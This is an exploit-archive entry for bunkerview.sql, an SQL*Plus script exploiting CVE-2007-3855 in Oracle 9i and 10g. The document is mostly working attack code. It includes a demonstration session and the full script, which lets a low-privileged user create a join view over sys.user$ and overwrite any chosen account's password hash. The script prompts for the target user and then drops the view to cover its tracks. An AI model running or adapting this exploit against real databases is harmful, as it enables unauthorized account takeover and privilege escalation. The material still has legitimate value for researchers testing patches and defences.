bunkerview.txt

Posted Jul 20, 2007
Authored by Andrea Purificato | Site rawlab.mindcreations.com

Exploit for Oracle 9i and 10g that uses an evil view to perform an unauthorized password update.

tags | exploit
advisories | CVE-2007-3855
SHA-256 | 67a721e9a7e576c4b91c255ef53da472e4330cc3f959dc516deafe74bdaf2711

--
-- bunkerview.sql
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
--
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
--
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- Target username (default TEST):
--
-- View created.
--
-- old 1: update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new 1: update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
--
-- 1 row updated.
--
--
-- View dropped.
--
--
-- Commit complete.
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
prompt
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as
select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
drop view bunkerview;
commit;